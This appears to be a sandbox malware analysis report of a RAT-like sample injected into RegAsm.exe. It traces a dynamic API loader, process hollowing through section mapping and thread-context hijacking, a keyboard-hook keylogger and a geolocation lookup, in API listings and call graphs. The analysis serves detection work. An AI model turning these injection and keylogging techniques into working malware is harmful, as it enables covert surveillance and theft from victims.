55758 100011a0 55756->55758 55759 100011e1 55756->55759 55757 10001168 lstrlenW 55757->55756 55760 100011c7 FindNextFileW 55758->55760 55761 100011aa 55758->55761 55759->55730 55760->55758 55763 100011da FindClose 55760->55763 55761->55760 55766 10001000 51 API calls ___scrt_fastfail 55761->55766 55763->55759 55765 10001148 lstrcatW lstrlenW 55764->55765 55765->55756 55765->55757 55766->55761 55802 4117d7 55767->55802 55769 411d57 55770 411d6d SetLastError 55769->55770 55771 4117d7 SetLastError 55769->55771 55778 411d35 55769->55778 55770->55778 55772 411d8a 55771->55772 55772->55770 55774 411dac GetNativeSystemInfo 55772->55774 55772->55778 55775 411df2 55774->55775 55787 411dff SetLastError 55775->55787 55805 411cde VirtualAlloc 55775->55805 55778->55724 55779 411e22 55780 411e47 GetProcessHeap HeapAlloc 55779->55780 55831 411cde VirtualAlloc 55779->55831 55782 411e70 55780->55782 55783 411e5e 55780->55783 55785 4117d7 SetLastError 55782->55785 55832 411cf5 VirtualFree 55783->55832 55788 411eb9 55785->55788 55786 411e3a 55786->55780 55786->55787 55787->55778 55789 411f6b 55788->55789 55806 411cde VirtualAlloc 55788->55806 55833 4120b2 GetProcessHeap HeapFree 55789->55833 55792 411ed2 ctype 55807 4117ea 55792->55807 55794 411efe 55794->55789 55811 411b9a 55794->55811 55798 411f36 55798->55778 55798->55789 55827 1000220c 55798->55827 55799 411f5c 55799->55778 55800 411f60 SetLastError 55799->55800 55800->55789 55803 4117e6 55802->55803 55804 4117db SetLastError 55802->55804 55803->55769 55804->55769 55805->55779 55806->55792 55808 4118c0 55807->55808 55810 411816 ctype ___scrt_get_show_window_mode 55807->55810 55808->55794 55809 4117d7 SetLastError 55809->55810 55810->55808 55810->55809 55812 411ca5 55811->55812 55813 411bbb IsBadReadPtr 55811->55813 55812->55789 55821 41198a 55812->55821 55813->55812 55820 411bd5 55813->55820 55816 411cbd SetLastError 55816->55812 55817 411ca7 SetLastError 55817->55812 55818 411c8a IsBadReadPtr 55818->55812 55818->55820 55820->55812 55820->55816 55820->55817 55820->55818 55834 440f5d 22 API calls 4 library calls 55820->55834 55825 4119b0 55821->55825 55822 411a99 55823 4118ed VirtualProtect 55822->55823 55824 411aab 55823->55824 55824->55798 55825->55822 55825->55824 55835 4118ed 55825->55835 55828 10002215 55827->55828 55829 1000221a dllmain_dispatch 55827->55829 55839 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55828->55839 55829->55799 55831->55786 55832->55787 55833->55778 55834->55820 55836 4118fe 55835->55836 55838 4118f6 55835->55838 55837 411971 VirtualProtect 55836->55837 55836->55838 55837->55838 55838->55825 55839->55829 55840 40165e 55841 401666 55840->55841 55843 401669 55840->55843 55842 4016a8 55844 43455e new 22 API calls 55842->55844 55843->55842 55845 401696 55843->55845 55846 40169c 55844->55846 55847 43455e new 22 API calls 55845->55847 55847->55846 55848 426cdc 55853 426d59 send 55848->55853 55854 10001f3f 55855 10001f4b ___scrt_is_nonwritable_in_current_image 55854->55855 55872 1000247c 55855->55872 55857 10001f52 55858 10002041 55857->55858 55859 10001f7c 55857->55859 55871 10001f57 ___scrt_is_nonwritable_in_current_image 55857->55871 55888 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55858->55888 55883 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55859->55883 55862 10002048 55863 10001f8b __RTC_Initialize 55863->55871 55884 100022fc RtlInitializeSListHead 55863->55884 55865 10001f99 ___scrt_initialize_default_local_stdio_options 55885 100046c5 5 API calls _ValidateLocalCookies 55865->55885 55867 10001fad 55867->55871 55886 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55867->55886 55869 10001fb8 55869->55871 55887 10004669 5 API calls _ValidateLocalCookies 55869->55887 55873 10002485 55872->55873 55889 10002933 IsProcessorFeaturePresent 55873->55889 55875 10002491 55890 100034ea 55875->55890 55877 1000249a 55877->55857 55878 10002496 55878->55877 55899 100053c8 55878->55899 55881 100024b1 55881->55857 55883->55863 55884->55865 55885->55867 55886->55869 55887->55871 55888->55862 55889->55875 55891 100034ef ___vcrt_initialize_winapi_thunks 55890->55891 55903 10003936 6 API calls 2 library calls 55891->55903 55893 100034f9 55894 100034fd 55893->55894 55904 100038e8 55893->55904 55894->55878 55896 10003505 55897 10003510 55896->55897 55912 10003972 RtlDeleteCriticalSection 55896->55912 55897->55878 55931 10007457 55899->55931 55902 10003529 7 API calls 3 library calls 55902->55877 55903->55893 55913 10003af1 55904->55913 55907 100038fd 55907->55896 55909 1000390b 55910 10003918 55909->55910 55919 1000391b 5 API calls ___vcrt_FlsFree 55909->55919 55910->55896 55912->55894 55920 10003a82 55913->55920 55915 10003b0b 55916 10003b24 TlsAlloc 55915->55916 55917 100038f2 55915->55917 55917->55907 55918 10003ba2 5 API calls try_get_function 55917->55918 55918->55909 55919->55907 55921 10003aaa 55920->55921 55923 10003aa6 __crt_fast_encode_pointer 55920->55923 55921->55923 55924 100039be 55921->55924 55923->55915 55925 100039cd try_get_first_available_module 55924->55925 55926 100039ea LoadLibraryExW 55925->55926 55928 10003a60 FreeLibrary 55925->55928 55929 10003a77 55925->55929 55930 10003a38 LoadLibraryExW 55925->55930 55926->55925 55927 10003a05 GetLastError 55926->55927 55927->55925 55928->55925 55929->55923 55930->55925 55934 10007470 55931->55934 55932 10002ada _ValidateLocalCookies 5 API calls 55933 100024a3 55932->55933 55933->55881 55933->55902 55934->55932 55935 10005bff 55943 10005d5c 55935->55943 55937 10005c13 55940 10005c1b 55941 10005c28 55940->55941 55951 10005c2b 10 API calls 55940->55951 55944 10005c45 _abort 4 API calls 55943->55944 55945 10005d83 55944->55945 55946 10005d9b TlsAlloc 55945->55946 55947 10005d8c 55945->55947 55946->55947 55948 10002ada _ValidateLocalCookies 5 API calls 55947->55948 55949 10005c09 55948->55949 55949->55937 55950 10005b7a 19 API calls 2 library calls 55949->55950 55950->55940 55951->55937

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                  • API String ID: 4236061018-3687161714
                                                                                                                                                                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                                                                                                                                  Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                                                                  • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                                                                  • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                                                                  • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 316982871-3035715614
                                                                                                                                                                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                                                                                                                                  Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1714 40a2f3-40a30a 1715 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1714->1715 1716 40a36e-40a37e GetMessageA 1714->1716 1715->1716 1719 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1715->1719 1717 40a380-40a398 TranslateMessage DispatchMessageA 1716->1717 1718 40a39a 1716->1718 1717->1716 1717->1718 1720 40a39c-40a3a1 1718->1720 1719->1720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • GetMessageA.USER32 ref: 0040A376
                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                                                                                                                  • API String ID: 3219506041-952744263
                                                                                                                                                                                                  • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                                                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                                                                                                  Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1731 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1738 10001177-1000119e lstrlenW FindFirstFileW 1731->1738 1739 10001168-10001172 lstrlenW 1731->1739 1740 100011a0-100011a8 1738->1740 1741 100011e1-100011e9 1738->1741 1739->1738 1742 100011c7-100011d8 FindNextFileW 1740->1742 1743 100011aa-100011c4 call 10001000 1740->1743 1742->1740 1745 100011da-100011db FindClose 1742->1745 1743->1742 1745->1741
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1747 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1752 41b456-41b477 InternetReadFile 1747->1752 1753 41b479-41b499 call 4020b7 call 403376 call 401fd8 1752->1753 1754 41b49d-41b4a0 1752->1754 1753->1754 1755 41b4a2-41b4a4 1754->1755 1756 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1754->1756 1755->1752 1755->1756 1760 41b4b8-41b4c2 1756->1760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                                                                                                  • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                                                                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
